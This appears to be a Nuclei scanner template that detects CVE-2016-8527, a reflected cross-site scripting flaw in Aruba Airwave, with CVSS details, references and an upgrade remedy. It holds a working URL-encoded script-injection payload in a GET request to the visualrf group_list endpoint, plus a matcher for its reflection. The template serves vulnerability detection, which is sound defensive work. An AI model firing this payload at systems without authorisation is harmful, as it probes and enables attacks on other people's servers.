51 lines
1.8 KiB
YAML
51 lines
1.8 KiB
YAML
id: CVE-2016-8527
|
|
|
|
info:
|
|
name: Aruba Airwave <8.2.3.1 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Upgrade Aruba Airwave to version 8.2.3.1 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/41482
|
|
- http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
|
|
- https://www.exploit-db.com/exploits/41482/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-8527
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2016-8527
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00166
|
|
epss-percentile: 0.53225
|
|
cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: hp
|
|
product: airwave
|
|
tags: cve2016,cve,aruba,xss,edb,hp
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100e0553f487ee2d58071813a5309f9348e9ca2cdaac784386a59e8c2d365bd1b7b022100de464f52b41938c66aeb7e2a014a9e466ad67eab9b926ec68cf7196538177e40:922c64590222798bb761d5b6d8e72950 |